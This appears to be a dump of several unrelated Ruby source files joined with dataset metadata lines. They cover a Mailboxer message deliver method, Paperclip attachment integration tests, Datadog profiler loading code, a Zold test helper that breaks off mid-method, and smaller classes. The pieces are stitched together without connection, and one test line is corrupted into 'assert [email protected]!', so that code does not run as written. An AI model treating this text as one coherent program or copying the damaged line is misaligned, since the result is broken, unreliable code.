# @param should_clean [Boolean] sanitize the message body/subject first
# @return [Mailboxer::Receipt] the sender's sentbox receipt
# Builds inbox receipts for every recipient plus a sentbox receipt for the
# sender; only if all receipts are valid are they saved, mail dispatched,
# and the on_deliver callback fired. The sender receipt is returned either way.
def deliver(reply = false, should_clean = true)
self.clean if should_clean
#Receiver receipts
temp_receipts = recipients.map { |r| build_receipt(r, 'inbox') }
#Sender receipt
sender_receipt = build_receipt(sender, 'sentbox', true)
temp_receipts << sender_receipt
if temp_receipts.all?(&:valid?)
temp_receipts.each(&:save!) #Save receipts
Mailboxer::MailDispatcher.new(self, recipients).call
conversation.touch if reply
# Recipients are transient state; reset once receipts exist.
self.recipients = nil
on_deliver_callback.call(self) if on_deliver_callback
end
sender_receipt
end
end
| 27.62 | 106 | 0.735699 |
6a8e0b1be33d431ef93a435482d1b7bbf1e7f96a | 20,000 | require './test/helper'
class IntegrationTest < Test::Unit::TestCase
context "Many models at once" do
setup do
rebuild_model
@file = File.new(File.join(FIXTURES_DIR, "5k.png"), 'rb')
300.times do |i|
Dummy.create! :avatar => @file
end
end
teardown { @file.close }
should "not exceed the open file limit" do
assert_nothing_raised do
dummies = Dummy.find(:all)
dummies.each { |dummy| dummy.avatar }
end
end
end
context "An attachment" do
setup do
rebuild_model :styles => { :thumb => "50x50#" }
@dummy = Dummy.new
@file = File.new(File.join(File.dirname(__FILE__),
"fixtures",
"5k.png"), 'rb')
@dummy.avatar = @file
assert @dummy.save
end
teardown { @file.close }
should "create its thumbnails properly" do
assert_match /\b50x50\b/, `identify "#{@dummy.avatar.path(:thumb)}"`
end
context 'reprocessing with unreadable original' do
setup { File.chmod(0000, @dummy.avatar.path) }
should "not raise an error" do
assert_nothing_raised do
silence_stream(STDERR) do
@dummy.avatar.reprocess!
end
end
end
should "return false" do
silence_stream(STDERR) do
assert [email protected]!
end
end
teardown { File.chmod(0644, @dummy.avatar.path) }
end
context "redefining its attachment styles" do
setup do
Dummy.class_eval do
has_attached_file :avatar, :styles => { :thumb => "150x25#", :dynamic => lambda { |a| '50x50#' } }
end
@d2 = Dummy.find(@dummy.id)
@original_timestamp = @d2.avatar_updated_at
@d2.avatar.reprocess!
@d2.save
end
should "create its thumbnails properly" do
assert_match /\b150x25\b/, `identify "#{@dummy.avatar.path(:thumb)}"`
assert_match /\b50x50\b/, `identify "#{@dummy.avatar.path(:dynamic)}"`
end
should "change the timestamp" do
assert_not_equal @original_timestamp, @d2.avatar_updated_at
end
end
end
context "Attachment" do
setup do
@thumb_path = "./test/../public/system/dummies/avatars/000/000/001/thumb/5k.png"
File.delete(@thumb_path) if File.exists?(@thumb_path)
rebuild_model :styles => { :thumb => "50x50#" }
@dummy = Dummy.new
@file = File.new(File.join(File.dirname(__FILE__),
"fixtures",
"5k.png"), 'rb')
end
teardown { @file.close }
should "not create the thumbnails upon saving when post-processing is disabled" do
@dummy.avatar.post_processing = false
@dummy.avatar = @file
assert @dummy.save
assert !File.exists?(@thumb_path)
end
should "create the thumbnails upon saving when post_processing is enabled" do
@dummy.avatar.post_processing = true
@dummy.avatar = @file
assert @dummy.save
assert File.exists?(@thumb_path)
end
end
context "Attachment with no generated thumbnails" do
setup do
@thumb_small_path = "./test/../public/system/dummies/avatars/000/000/001/thumb_small/5k.png"
@thumb_large_path = "./test/../public/system/dummies/avatars/000/000/001/thumb_large/5k.png"
File.delete(@thumb_small_path) if File.exists?(@thumb_small_path)
File.delete(@thumb_large_path) if File.exists?(@thumb_large_path)
rebuild_model :styles => { :thumb_small => "50x50#", :thumb_large => "60x60#" }
@dummy = Dummy.new
@file = File.new(File.join(File.dirname(__FILE__),
"fixtures",
"5k.png"), 'rb')
@dummy.avatar.post_processing = false
@dummy.avatar = @file
assert @dummy.save
@dummy.avatar.post_processing = true
end
teardown { @file.close }
should "allow us to create all thumbnails in one go" do
assert !File.exists?(@thumb_small_path)
assert !File.exists?(@thumb_large_path)
@dummy.avatar.reprocess!
assert File.exists?(@thumb_small_path)
assert File.exists?(@thumb_large_path)
end
should "allow us to selectively create each thumbnail" do
assert !File.exists?(@thumb_small_path)
assert !File.exists?(@thumb_large_path)
@dummy.avatar.reprocess! :thumb_small
assert File.exists?(@thumb_small_path)
assert !File.exists?(@thumb_large_path)
@dummy.avatar.reprocess! :thumb_large
assert File.exists?(@thumb_large_path)
end
end
# When the :original style itself is a processing target ("2x2#"), the
# reported attachment size must be the processed file's, not the upload's.
context "A model that modifies its original" do
  setup do
    rebuild_model :styles => { :original => "2x2#" }
    @dummy = Dummy.new
    @file = File.new(File.join(File.dirname(__FILE__),
                               "fixtures",
                               "5k.png"), 'rb')
    @dummy.avatar = @file
  end
  should "report the file size of the processed file and not the original" do
    assert_not_equal File.size(@file.path), @dummy.avatar.size
  end
  # NOTE(review): teardown declared after the should block — valid shoulda DSL,
  # though siblings in this file declare it right after setup.
  teardown { @file.close }
end
# Attachments whose :path is scoped under the record id must clean up their
# per-record directory tree on deletion.
# Fix: File.exists? is a deprecated alias that was removed in Ruby 3.2;
# use File.exist? instead.
context "A model with attachments scoped under an id" do
  setup do
    rebuild_model :styles => { :large => "100x100",
                               :medium => "50x50" },
                  :path => ":rails_root/tmp/:id/:attachments/:style.:extension"
    @dummy = Dummy.new
    @file = File.new(File.join(File.dirname(__FILE__),
                               "fixtures",
                               "5k.png"), 'rb')
    @dummy.avatar = @file
  end

  teardown { @file.close }

  context "when saved" do
    setup do
      @dummy.save
      @saved_path = @dummy.avatar.path(:large)
    end

    should "have a large file in the right place" do
      assert File.exist?(@dummy.avatar.path(:large))
    end

    context "and deleted" do
      setup do
        @dummy.avatar.clear
        @dummy.save
      end

      should "not have a large file in the right place anymore" do
        assert ! File.exist?(@saved_path)
      end

      # Clearing should also remove the now-empty :id/:attachments directories.
      should "not have its next two parent directories" do
        assert ! File.exist?(File.dirname(@saved_path))
        assert ! File.exist?(File.dirname(File.dirname(@saved_path)))
      end

      # Directory cleanup is best-effort: unexpected SystemCallErrors from
      # rmdir must not propagate.
      before_should "not die if an unexpected SystemCallError happens" do
        FileUtils.stubs(:rmdir).raises(Errno::EPIPE)
      end
    end
  end
end
# :convert_options should default to nil and be readable back from the
# attachment definition when supplied.
context "A model with no convert_options setting" do
  setup do
    rebuild_model :styles => { :large => "300x300>",
                               :medium => "100x100",
                               :thumb => ["32x32#", :gif] },
                  :default_style => :medium,
                  :url => "/:attachment/:class/:style/:id/:basename.:extension",
                  :path => ":rails_root/tmp/:attachment/:class/:style/:id/:basename.:extension"
    @dummy = Dummy.new
  end
  should "have its definition return nil when asked about convert_options" do
    assert ! Dummy.attachment_definitions[:avatar][:convert_options]
  end
  context "redefined to have convert_options setting" do
    setup do
      rebuild_model :styles => { :large => "300x300>",
                                 :medium => "100x100",
                                 :thumb => ["32x32#", :gif] },
                    :convert_options => "-strip -depth 8",
                    :default_style => :medium,
                    :url => "/:attachment/:class/:style/:id/:basename.:extension",
                    :path => ":rails_root/tmp/:attachment/:class/:style/:id/:basename.:extension"
    end
    should "have its definition return convert_options value when asked about convert_options" do
      assert_equal "-strip -depth 8", Dummy.attachment_definitions[:avatar][:convert_options]
    end
  end
end
# Mirrors the convert_options tests above for :source_file_options (options
# passed to the converter for the *input* file, e.g. "-density 400").
context "A model with no source_file_options setting" do
  setup do
    rebuild_model :styles => { :large => "300x300>",
                               :medium => "100x100",
                               :thumb => ["32x32#", :gif] },
                  :default_style => :medium,
                  :url => "/:attachment/:class/:style/:id/:basename.:extension",
                  :path => ":rails_root/tmp/:attachment/:class/:style/:id/:basename.:extension"
    @dummy = Dummy.new
  end
  should "have its definition return nil when asked about source_file_options" do
    assert ! Dummy.attachment_definitions[:avatar][:source_file_options]
  end
  context "redefined to have source_file_options setting" do
    setup do
      rebuild_model :styles => { :large => "300x300>",
                                 :medium => "100x100",
                                 :thumb => ["32x32#", :gif] },
                    :source_file_options => "-density 400",
                    :default_style => :medium,
                    :url => "/:attachment/:class/:style/:id/:basename.:extension",
                    :path => ":rails_root/tmp/:attachment/:class/:style/:id/:basename.:extension"
    end
    should "have its definition return source_file_options value when asked about source_file_options" do
      assert_equal "-density 400", Dummy.attachment_definitions[:avatar][:source_file_options]
    end
  end
end
# Written files must honor the process umask. The literals are octal:
# 000 == 0, 002 == 2, 022 == 18 (i.e. umasks 0o000, 0o002, 0o022).
[000,002,022].each do |umask|
  context "when the umask is #{umask}" do
    setup do
      rebuild_model
      @dummy = Dummy.new
      @file = File.new(File.join(FIXTURES_DIR, "5k.png"), 'rb')
      # File.umask(new) returns the previous umask; restore it in teardown.
      @umask = File.umask(umask)
    end
    teardown do
      File.umask @umask
      @file.close
    end
    should "respect the current umask" do
      @dummy.avatar = @file
      @dummy.save
      # Compare only the permission bits that the umask can affect.
      assert_equal 0666&~umask, 0666&File.stat(@dummy.avatar.path).mode
    end
  end
end
# End-to-end coverage of the filesystem storage backend: write, reload,
# delete, validation, and attachment-to-attachment assignment. Geometry is
# verified by shelling out to ImageMagick's `identify`.
# Fix: File.exists? is a deprecated alias that was removed in Ruby 3.2;
# use File.exist? instead.
context "A model with a filesystem attachment" do
  setup do
    rebuild_model :styles => { :large => "300x300>",
                               :medium => "100x100",
                               :thumb => ["32x32#", :gif] },
                  :default_style => :medium,
                  :url => "/:attachment/:class/:style/:id/:basename.:extension",
                  :path => ":rails_root/tmp/:attachment/:class/:style/:id/:basename.:extension"
    @dummy = Dummy.new
    @file = File.new(File.join(FIXTURES_DIR, "5k.png"), 'rb')
    @bad_file = File.new(File.join(FIXTURES_DIR, "bad.png"), 'rb')
    assert @dummy.avatar = @file
    assert @dummy.valid?, @dummy.errors.full_messages.join(", ")
    assert @dummy.save
  end

  teardown { [@file, @bad_file].each(&:close) }

  should "write and delete its files" do
    # Each style must be written at its expected geometry.
    [["434x66", :original],
     ["300x46", :large],
     ["100x15", :medium],
     ["32x32", :thumb]].each do |geo, style|
      cmd = %Q[identify -format "%wx%h" "#{@dummy.avatar.path(style)}"]
      assert_equal geo, `#{cmd}`.chomp, cmd
    end
    saved_paths = [:thumb, :medium, :large, :original].collect{|s| @dummy.avatar.path(s) }
    @d2 = Dummy.find(@dummy.id)
    # Default style is :medium, so the bare path resolves to 100x15.
    assert_equal "100x15", `identify -format "%wx%h" "#{@d2.avatar.path}"`.chomp
    assert_equal "434x66", `identify -format "%wx%h" "#{@d2.avatar.path(:original)}"`.chomp
    assert_equal "300x46", `identify -format "%wx%h" "#{@d2.avatar.path(:large)}"`.chomp
    assert_equal "100x15", `identify -format "%wx%h" "#{@d2.avatar.path(:medium)}"`.chomp
    assert_equal "32x32", `identify -format "%wx%h" "#{@d2.avatar.path(:thumb)}"`.chomp
    assert @dummy.valid?
    assert @dummy.save
    saved_paths.each do |p|
      assert File.exist?(p)
    end
    # Clearing and saving must delete every style file.
    @dummy.avatar.clear
    assert_nil @dummy.avatar_file_name
    assert @dummy.valid?
    assert @dummy.save
    saved_paths.each do |p|
      assert ! File.exist?(p)
    end
    @d2 = Dummy.find(@dummy.id)
    assert_nil @d2.avatar_file_name
  end

  should "work exactly the same when new as when reloaded" do
    @d2 = Dummy.find(@dummy.id)
    assert_equal @dummy.avatar_file_name, @d2.avatar_file_name
    [:thumb, :medium, :large, :original].each do |style|
      assert_equal @dummy.avatar.path(style), @d2.avatar.path(style)
    end
    saved_paths = [:thumb, :medium, :large, :original].collect{|s| @dummy.avatar.path(s) }
    @d2.avatar.clear
    assert @d2.save
    saved_paths.each do |p|
      assert ! File.exist?(p)
    end
  end

  should "not abide things that don't have adapters" do
    assert_raises(Paperclip::AdapterRegistry::NoHandlerError) do
      @dummy.avatar = "not a file"
    end
  end

  should "not be ok with bad files" do
    @dummy.avatar = @bad_file
    assert ! @dummy.valid?
  end

  should "know the difference between good files, bad files, and not files when validating" do
    Dummy.validates_attachment_presence :avatar
    @d2 = Dummy.find(@dummy.id)
    @d2.avatar = @file
    assert @d2.valid?, @d2.errors.full_messages.inspect
    @d2.avatar = @bad_file
    assert ! @d2.valid?
  end

  should "be able to reload without saving and not have the file disappear" do
    @dummy.avatar = @file
    assert @dummy.save, @dummy.errors.full_messages.inspect
    # clear without save, then reload: the persisted attachment must survive.
    @dummy.avatar.clear
    assert_nil @dummy.avatar_file_name
    @dummy.reload
    assert_equal "5k.png", @dummy.avatar_file_name
  end

  context "that is assigned its file from another Paperclip attachment" do
    setup do
      @dummy2 = Dummy.new
      @file2 = File.new(File.join(FIXTURES_DIR, "12k.png"), 'rb')
      assert @dummy2.avatar = @file2
      @dummy2.save
    end

    teardown { @file2.close }

    should "work when assigned a file" do
      assert_not_equal `identify -format "%wx%h" "#{@dummy.avatar.path(:original)}"`,
                       `identify -format "%wx%h" "#{@dummy2.avatar.path(:original)}"`
      assert @dummy.avatar = @dummy2.avatar
      @dummy.save
      assert_equal @dummy.avatar_file_name, @dummy2.avatar_file_name
      assert_equal `identify -format "%wx%h" "#{@dummy.avatar.path(:original)}"`,
                   `identify -format "%wx%h" "#{@dummy2.avatar.path(:original)}"`
    end
  end
end
# Regression test: a has_many named :attachments must not clash with
# Paperclip's internals when the model also has an attachment.
# Fixes: the test name read "should should not error" (shoulda already
# prefixes "should "), and the fixture file handle was never closed.
context "A model with an attachments association and a Paperclip attachment" do
  setup do
    Dummy.class_eval do
      has_many :attachments, :class_name => 'Dummy'
    end
    @file = File.new(File.join(File.dirname(__FILE__), "fixtures", "5k.png"), 'rb')
    @dummy = Dummy.new
    @dummy.avatar = @file
  end

  teardown { @file.close }

  should "not error when saving" do
    @dummy.save!
  end
end
if ENV['S3_TEST_BUCKET']
# Downloads every style of +attachment+ from S3 over HTTP and returns a hash
# of style => open Tempfile. Callers are responsible for closing the files.
def s3_files_for attachment
  [:thumb, :medium, :large, :original].each_with_object({}) do |style, files|
    data = `curl "#{attachment.url(style)}" 2>/dev/null`.chomp
    tempfile = Tempfile.new("paperclip-test")
    tempfile.binmode
    tempfile.write(data)
    tempfile.rewind
    files[style] = tempfile
  end
end
# Issues a HEAD request for +style+ of +attachment+ and returns the response
# headers as a hash of lower-cased header name => value.
def s3_headers_for attachment, style
  raw = `curl --head "#{attachment.url(style)}" 2>/dev/null`
  raw.split("\n").each_with_object({}) do |head, headers|
    # Split into name/value at the first colon; the status line has no colon
    # and maps to itself (parts.last == parts.first for a 1-element split).
    parts = head.chomp.split(/\s*:\s*/, 2)
    headers[parts.first.downcase] = parts.last unless parts.empty?
  end
end
# End-to-end coverage of the S3 storage backend (only runs when
# ENV['S3_TEST_BUCKET'] is set). Files are fetched back via curl and their
# geometry checked with ImageMagick's `identify`.
context "A model with an S3 attachment" do
  setup do
    rebuild_model :styles => { :large => "300x300>",
                               :medium => "100x100",
                               :thumb => ["32x32#", :gif] },
                  :storage => :s3,
                  :s3_credentials => File.new(File.join(File.dirname(__FILE__), "s3.yml")),
                  :default_style => :medium,
                  :bucket => ENV['S3_TEST_BUCKET'],
                  :path => ":class/:attachment/:id/:style/:basename.:extension"
    @dummy = Dummy.new
    @file = File.new(File.join(FIXTURES_DIR, "5k.png"), 'rb')
    @bad_file = File.new(File.join(FIXTURES_DIR, "bad.png"), 'rb')
    assert @dummy.avatar = @file
    assert @dummy.valid?
    assert @dummy.save
    # Tempfiles of what actually landed on S3, keyed by style.
    @files_on_s3 = s3_files_for @dummy.avatar
  end
  teardown do
    @file.close
    @bad_file.close
    @files_on_s3.values.each(&:close)
  end
  context 'assigning itself to a new model' do
    setup do
      @d2 = Dummy.new
      @d2.avatar = @dummy.avatar
      @d2.save
    end
    should "have the same name as the old file" do
      assert_equal @d2.avatar.original_filename, @dummy.avatar.original_filename
    end
  end
  should "have the same contents as the original" do
    assert_equal @file.read, @files_on_s3[:original].read
  end
  should "write and delete its files" do
    [["434x66", :original],
     ["300x46", :large],
     ["100x15", :medium],
     ["32x32", :thumb]].each do |geo, style|
      cmd = %Q[identify -format "%wx%h" "#{@files_on_s3[style].path}"]
      assert_equal geo, `#{cmd}`.chomp, cmd
    end
    @d2 = Dummy.find(@dummy.id)
    @d2_files = s3_files_for @d2.avatar
    [["434x66", :original],
     ["300x46", :large],
     ["100x15", :medium],
     ["32x32", :thumb]].each do |geo, style|
      cmd = %Q[identify -format "%wx%h" "#{@d2_files[style].path}"]
      assert_equal geo, `#{cmd}`.chomp, cmd
    end
    # A bad (non-file) assignment must leave the previous attachment intact.
    @dummy.avatar = "not a valid file but not nil"
    assert_equal File.basename(@file.path), @dummy.avatar_file_name
    assert @dummy.valid?
    assert @dummy.save
    [:thumb, :medium, :large, :original].each do |style|
      assert @dummy.avatar.exists?(style)
    end
    # Clearing and saving must delete every style object on S3.
    @dummy.avatar.clear
    assert_nil @dummy.avatar_file_name
    assert @dummy.valid?
    assert @dummy.save
    [:thumb, :medium, :large, :original].each do |style|
      assert ! @dummy.avatar.exists?(style)
    end
    @d2 = Dummy.find(@dummy.id)
    assert_nil @d2.avatar_file_name
  end
  should "work exactly the same when new as when reloaded" do
    @d2 = Dummy.find(@dummy.id)
    assert_equal @dummy.avatar_file_name, @d2.avatar_file_name
    [:thumb, :medium, :large, :original].each do |style|
      assert_equal @dummy.avatar.to_file(style).read, @d2.avatar.to_file(style).read
    end
    saved_keys = [:thumb, :medium, :large, :original].collect{|s| @dummy.avatar.to_file(s) }
    @d2.avatar.clear
    assert @d2.save
    [:thumb, :medium, :large, :original].each do |style|
      assert ! @dummy.avatar.exists?(style)
    end
  end
  should "know the difference between good files, bad files, not files, and nil" do
    expected = @dummy.avatar.to_file
    @dummy.avatar = "not a file"
    assert @dummy.valid?
    assert_equal expected.read, @dummy.avatar.to_file.read
    @dummy.avatar = @bad_file
    assert ! @dummy.valid?
    @dummy.avatar = nil
    assert @dummy.valid?
    # With a presence validation, nil becomes invalid too.
    Dummy.validates_attachment_presence :avatar
    @d2 = Dummy.find(@dummy.id)
    @d2.avatar = @file
    assert @d2.valid?
    @d2.avatar = @bad_file
    assert ! @d2.valid?
    @d2.avatar = nil
    assert ! @d2.valid?
  end
  should "be able to reload without saving and not have the file disappear" do
    @dummy.avatar = @file
    assert @dummy.save
    @dummy.avatar = nil
    assert_nil @dummy.avatar_file_name
    @dummy.reload
    assert_equal "5k.png", @dummy.avatar_file_name
  end
  should "have the right content type" do
    headers = s3_headers_for(@dummy.avatar, :original)
    assert_equal 'image/png', headers['content-type']
  end
end
end
end
| 32.894737 | 108 | 0.57625 |
e24c2b0a8f7cd8e20f92bf5488818cfe12ddfdbd | 594 | # frozen_string_literal: true
module Discounts
  # Abstract base use case for discounts. Concrete subclasses live under the
  # Discounts:: namespace and are expected to override #call!.
  class Base < Micro::Case
    attributes :balance, :quantity_condition

    # Guard: the base class itself must never be invoked directly.
    def call!
      Failure result: { error: 'Error: this method should not be call directly' }
    end

    private

    # Balance snapshot after applying the discount, tagged with the
    # subclass-derived discount identifier.
    def new_balance
      {
        quantity: new_quantity,
        price: new_price,
        total: new_total,
        discount: discount_name
      }
    end

    # e.g. "Discounts::TenPercent" => "ten_percent"
    def discount_name
      self.class.name.gsub('Discounts::', '').underscore
    end

    def new_quantity
      balance[:quantity]
    end

    def new_price
      balance[:price]
    end

    def new_total
      new_price * new_quantity
    end
  end
end
| 18 | 81 | 0.63468 |
d5ff9b025cc9d3db5aa8a2d20c96c98645631b2d | 468 | # frozen_string_literal: true
module Banzai
  module Pipeline
    # Full Markdown pipeline variant for descriptions: block-level elements
    # unsuitable for short description text are stripped from the sanitizer
    # whitelist.
    class DescriptionPipeline < FullPipeline
      WHITELIST = Banzai::Filter::SanitizationFilter::LIMITED.deep_dup.merge(
        elements: Banzai::Filter::SanitizationFilter::LIMITED[:elements] - %w[pre code img ol ul li]
      )

      def self.transform_context(context)
        # Hand the reduced whitelist to the SanitizationFilter.
        super(context).merge(whitelist: WHITELIST)
      end
    end
  end
end
| 24.631579 | 100 | 0.666667 |
6a8d8cd62025107c08c26f7f82ef9a0cb0736a6b | 471 | require 'spec_helper'
# Verifies that a failed upload-set update notifies the depositor via their
# mailbox inbox.
describe Sufia::UploadSetUpdateFailureService do
  let(:depositor) { create(:user) }
  let(:upload_set) { UploadSet.create }
  let(:inbox) { depositor.mailbox.inbox }
  describe "#call" do
    subject { described_class.new(depositor, upload_set) }
    it "sends failing mail" do
      subject.call
      # Exactly one message, with the expected failure subject.
      expect(inbox.count).to eq(1)
      inbox.each { |msg| expect(msg.last_message.subject).to eq('Failing Upload Set Update') }
    end
  end
end
| 26.166667 | 94 | 0.692144 |
7a6a7c6a44f409d379078377f34c01117d6f8c35 | 6,871 | require 'datadog/core/environment/variable_helpers'
require 'ddtrace/utils/only_once'
module Datadog
# Contains profiler for generating stack profiles, etc.
module Profiling # rubocop:disable Metrics/ModuleLength
GOOGLE_PROTOBUF_MINIMUM_VERSION = Gem::Version.new('3.0')
private_constant :GOOGLE_PROTOBUF_MINIMUM_VERSION
SKIPPED_NATIVE_EXTENSION_ONLY_ONCE = Datadog::Utils::OnlyOnce.new
private_constant :SKIPPED_NATIVE_EXTENSION_ONLY_ONCE
def self.supported?
unsupported_reason.nil?
end
def self.unsupported_reason
# NOTE: Only the first matching reason is returned, so try to keep a nice order on reasons -- e.g. tell users
# first that they can't use this on JRuby before telling them that they are missing protobuf
ruby_engine_unsupported? ||
native_library_failed_to_load? ||
protobuf_gem_unavailable? ||
protobuf_version_unsupported? ||
protobuf_failed_to_load?
end
private_class_method def self.ruby_engine_unsupported?
'JRuby is not supported' if RUBY_ENGINE == 'jruby'
end
private_class_method def self.protobuf_gem_unavailable?
# NOTE: On environments where protobuf is already loaded, we skip the check. This allows us to support environments
# where no Gem.loaded_version is NOT available but customers are able to load protobuf; see for instance
# https://github.com/teamcapybara/capybara/commit/caf3bcd7664f4f2691d0ca9ef3be9a2a954fecfb
if !defined?(::Google::Protobuf) && Gem.loaded_specs['google-protobuf'].nil?
"Missing google-protobuf dependency; please add `gem 'google-protobuf', '~> 3.0'` to your Gemfile or gems.rb file"
end
end
private_class_method def self.protobuf_version_unsupported?
# See above for why we skip the check when protobuf is already loaded; note that when protobuf was already loaded
# we skip the version check to avoid the call to Gem.loaded_specs. Unfortunately, protobuf does not seem to
# expose the gem version constant elsewhere, so in that setup we are not able to check the version.
if !defined?(::Google::Protobuf) && Gem.loaded_specs['google-protobuf'].version < GOOGLE_PROTOBUF_MINIMUM_VERSION
'Your google-protobuf is too old; ensure that you have google-protobuf >= 3.0 by ' \
"adding `gem 'google-protobuf', '~> 3.0'` to your Gemfile or gems.rb file"
end
end
private_class_method def self.protobuf_failed_to_load?
unless protobuf_loaded_successfully?
'There was an error loading the google-protobuf library; see previous warning message for details'
end
end
# The `google-protobuf` gem depends on a native component, and its creators helpfully tried to provide precompiled
# versions of this extension on rubygems.org.
#
# Unfortunately, for a long time, the supported Ruby versions metadata on these precompiled versions of the extension
# was not correctly set. (This is fixed in newer versions -- but not all Ruby versions we want to support can use
# these.)
#
# Thus, the gem can still be installed, but can be in a broken state. To avoid breaking customer applications, we
# use this helper to load it and gracefully handle failures.
private_class_method def self.protobuf_loaded_successfully?
return @protobuf_loaded if defined?(@protobuf_loaded)
begin
require 'google/protobuf'
@protobuf_loaded = true
rescue LoadError => e
# NOTE: We use Kernel#warn here because this code gets run BEFORE Datadog.logger is actually set up.
# In the future it'd be nice to shuffle the logger startup to happen first to avoid this special case.
Kernel.warn(
'[DDTRACE] Error while loading google-protobuf gem. ' \
"Cause: '#{e.message}' Location: '#{Array(e.backtrace).first}'. " \
'This can happen when google-protobuf is missing its native components. ' \
'To fix this, try removing and reinstalling the gem, forcing it to recompile the components: ' \
'`gem uninstall google-protobuf -a; BUNDLE_FORCE_RUBY_PLATFORM=true bundle install`. ' \
'If the error persists, please contact support via <https://docs.datadoghq.com/help/> or ' \
'file a bug at <https://github.com/DataDog/dd-trace-rb/blob/master/CONTRIBUTING.md#found-a-bug>.'
)
@protobuf_loaded = false
end
end
private_class_method def self.native_library_failed_to_load?
success, exception = try_loading_native_library
unless success
if exception
'There was an error loading the profiling native extension due to ' \
"'#{exception.message}' at '#{exception.backtrace.first}'"
else
'The profiling native extension did not load correctly. ' \
'If the error persists, please contact support via <https://docs.datadoghq.com/help/> or ' \
'file a bug at <https://github.com/DataDog/dd-trace-rb/blob/master/CONTRIBUTING.md#found-a-bug>.'
end
end
end
private_class_method def self.try_loading_native_library
if Datadog::Core::Environment::VariableHelpers.env_to_bool('DD_PROFILING_NO_EXTENSION', false)
SKIPPED_NATIVE_EXTENSION_ONLY_ONCE.run do
Kernel.warn(
'[DDTRACE] Skipped loading of profiling native extension due to DD_PROFILING_NO_EXTENSION environment ' \
'variable being set. ' \
'This option is experimental and will lead to the profiler not working in future releases. ' \
'If you needed to use this, please tell us why on <https://github.com/DataDog/dd-trace-rb/issues/new>.'
)
end
return [true, nil]
end
begin
require "ddtrace_profiling_native_extension.#{RUBY_VERSION}_#{RUBY_PLATFORM}"
success =
defined?(Datadog::Profiling::NativeExtension) && Datadog::Profiling::NativeExtension.send(:native_working?)
[success, nil]
rescue StandardError, LoadError => e
[false, e]
end
end
private_class_method def self.load_profiling
return false unless supported?
require 'ddtrace/profiling/ext/cpu'
require 'ddtrace/profiling/ext/forking'
require 'ddtrace/profiling/collectors/stack'
require 'ddtrace/profiling/exporter'
require 'ddtrace/profiling/recorder'
require 'ddtrace/profiling/scheduler'
require 'ddtrace/profiling/tasks/setup'
require 'ddtrace/profiling/transport/io'
require 'ddtrace/profiling/transport/http'
require 'ddtrace/profiling/profiler'
require 'ddtrace/profiling/native_extension'
require 'ddtrace/profiling/trace_identifiers/helper'
require 'ddtrace/profiling/pprof/pprof_pb'
true
end
load_profiling if supported?
end
end
| 45.503311 | 122 | 0.704264 |
d5723050822efcf632796fbe7436b23173f495f2 | 1,146 | module Gws::Circular::See
extend ActiveSupport::Concern
included do
field :see_type, type: String, default: 'normal'
field :seen, type: Hash, default: {}
permit_params :see_type
end
def seen_at(user)
self.seen[user.id.to_s].try { |time| time.in_time_zone }
end
def seen?(user)
!unseen?(user)
end
def unseen?(user = nil)
return false if user.nil?
seen.exclude?(user.id.to_s)
end
def set_seen(user)
self.seen[user.id.to_s] = Time.zone.now.utc
self
end
def unset_seen(user)
self.seen.delete(user.id.to_s)
self
end
def see_action_label(user)
key = seen?(user) ? 'unset_seen' : 'set_seen'
I18n.t(key, scope: 'gws/circular.post')
end
def see_type_options
%w(normal simple).map{ |key| [I18n.t(key, scope: 'gws/circular.options.see_type'), key] }
end
def seen_users
seen = self.seen.to_a.select { |user_id, seen_at| seen_at.present? }
seen_user_ids = seen.map { |user_id, seen_at| user_id }
Gws::User.in(id: seen_user_ids)
end
def see_type_simple?
see_type == "simple"
end
def see_type_normal?
!see_type_simple?
end
end
| 20.105263 | 93 | 0.658813 |
9167c4ce180e8c60e20c8bc1c7780f26470f1251 | 254 | # frozen_string_literal: true
module Sail
class ApplicationController < ActionController::Base # :nodoc:
protect_from_forgery with: :exception
protected
def current_user
main_app.scope.request.env["warden"]&.user
end
end
end
| 18.142857 | 64 | 0.728346 |
f8a18e9d38dbf874ed323581002bb163d90968f7 | 2,957 | # frozen_string_literal: true
# Copyright (c) 2018 Yegor Bugayenko
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the 'Software'), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
require 'tmpdir'
require_relative '../lib/zold/id'
require_relative '../lib/zold/wallet'
require_relative '../lib/zold/wallets'
require_relative '../lib/zold/sync_wallets'
require_relative '../lib/zold/key'
require_relative '../lib/zold/version'
require_relative '../lib/zold/remotes'
# Fake home dir.
# Author:: Yegor Bugayenko ([email protected])
# Copyright:: Copyright (c) 2018 Yegor Bugayenko
# License:: MIT
class FakeHome
  attr_reader :dir

  def initialize(dir = __dir__)
    @dir = dir
  end

  # Yields a FakeHome rooted in a fresh temp dir (seeded with the fixture RSA
  # key); the directory is removed when the block returns.
  def run
    Dir.mktmpdir do |dir|
      FileUtils.copy(File.join(__dir__, '../fixtures/id_rsa'), File.join(dir, 'id_rsa'))
      yield FakeHome.new(dir)
    end
  end

  # Synchronized wallet store backed by this home directory.
  def wallets
    Zold::SyncWallets.new(Zold::Wallets.new(@dir), File.join(@dir, 'locks'))
  end

  # Creates a wallet with the fixture public key and copies its file into
  # +dir+; returns the copied Zold::Wallet.
  def create_wallet(id = Zold::Id.new, dir = @dir)
    target = Zold::Wallet.new(File.join(dir, id.to_s))
    wallets.find(id) do |w|
      w.init(id, Zold::Key.new(file: File.join(__dir__, '../fixtures/id_rsa.pub')))
      File.write(target.path, File.read(w.path))
    end
    target
  end

  # JSON payload for a freshly created wallet, shaped like a node response.
  def create_wallet_json(id = Zold::Id.new)
    require_relative '../lib/zold/score'
    score = Zold::Score::ZERO
    Dir.mktmpdir 'wallets' do |external_dir|
      wallet = create_wallet(id, external_dir)
      {
        version: Zold::VERSION,
